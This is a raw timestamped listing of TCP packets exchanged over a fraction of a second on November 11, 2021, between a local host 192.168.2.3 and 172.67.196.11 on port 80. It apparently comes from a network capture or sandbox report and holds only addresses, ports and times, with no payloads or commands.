                                                                                                                          Nov 11, 2021 01:57:46.544845104 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544862986 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544878960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544897079 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544919014 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544919968 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544939995 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544964075 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.544965029 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.544985056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545006990 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545008898 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545027018 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545048952 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545049906 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545069933 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545093060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545093060 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545114040 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545135975 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545137882 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545160055 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545181036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545182943 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545202017 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545224905 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545226097 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545243979 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545267105 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545268059 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545286894 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545308113 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545310974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545331955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545355082 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545361042 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545386076 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545399904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545411110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545430899 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545455933 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545459032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545481920 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545506001 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545515060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545537949 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545558929 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.545567989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.545608997 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548652887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548671007 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548686028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548705101 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548722982 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548726082 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548744917 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548746109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548763037 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548784018 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548788071 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548800945 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548819065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548830986 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548837900 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548861027 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548868895 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548887014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548906088 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548912048 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548923969 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548943996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548949003 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548959970 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548979044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.548990011 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.548996925 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549019098 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549030066 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549036980 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549057007 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549061060 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549074888 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549096107 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549094915 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549112082 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549124956 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549135923 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549148083 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549160004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549170971 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549181938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549194098 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549205065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549226046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549232006 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549242020 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549261093 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549263000 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549283028 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549287081 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549299002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549307108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549324989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549345016 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549354076 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549370050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549385071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549387932 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549401999 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549422979 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549424887 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549446106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549463987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549464941 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549488068 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549499035 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549514055 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549530029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549549103 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549555063 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549573898 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549592972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549592972 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549617052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549637079 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549648046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549668074 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549688101 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549690962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549711943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549730062 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549736977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549757957 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549776077 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549777031 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549794912 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549813986 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549814939 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549832106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549851894 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549860954 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549869061 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549890041 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549896955 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549906969 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549926996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549931049 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549945116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549961090 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.549964905 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.549983978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550004005 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550007105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550020933 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550046921 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550046921 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550065041 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550084114 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550091028 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550116062 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550141096 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550133944 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550174952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550204992 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550215006 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550232887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550260067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550263882 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550278902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550297976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550301075 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.550314903 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.550340891 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.672188997 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.736568928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753101110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753149033 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753190994 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753257990 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753269911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753299952 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753304958 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753350973 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753396988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753403902 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753437996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753484964 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753487110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753528118 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753572941 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753618956 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753671885 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753684044 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753695011 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753725052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753772020 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753813028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753848076 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753859043 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753863096 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753902912 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753950119 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.753957033 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.753993034 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754039049 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754060984 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754084110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754132032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754151106 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754173994 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754220963 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754244089 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754266977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754313946 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754348993 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754358053 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754401922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754440069 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754446983 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754492998 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754492998 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754535913 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754585028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754591942 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754626989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754676104 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754705906 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754720926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754760981 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754806995 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754834890 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754853964 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754875898 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754895926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754940987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.754951954 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.754982948 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755028963 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755038023 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755073071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755115986 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755134106 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755162001 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755206108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755225897 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755250931 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755294085 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755311966 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755337954 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755384922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755397081 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755429029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755475998 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755485058 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755521059 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755567074 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755575895 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755609035 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755654097 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755667925 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755700111 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755745888 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755754948 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755790949 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755835056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755848885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755882025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755924940 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.755958080 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.755966902 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756014109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756025076 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756057024 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756103039 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756112099 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756148100 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756190062 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756230116 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756237030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756283045 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756303072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756326914 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756372929 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756378889 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756417036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756463051 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756479025 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756508112 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756561041 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756562948 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756607056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756659031 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756660938 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756700993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756743908 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756778955 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756793022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756845951 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756856918 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.756918907 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756964922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.756987095 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757009029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757055044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757070065 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757100105 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757143974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757154942 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757190943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757236004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757266045 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757278919 CET8049752172.67.196.11192.168.2.3
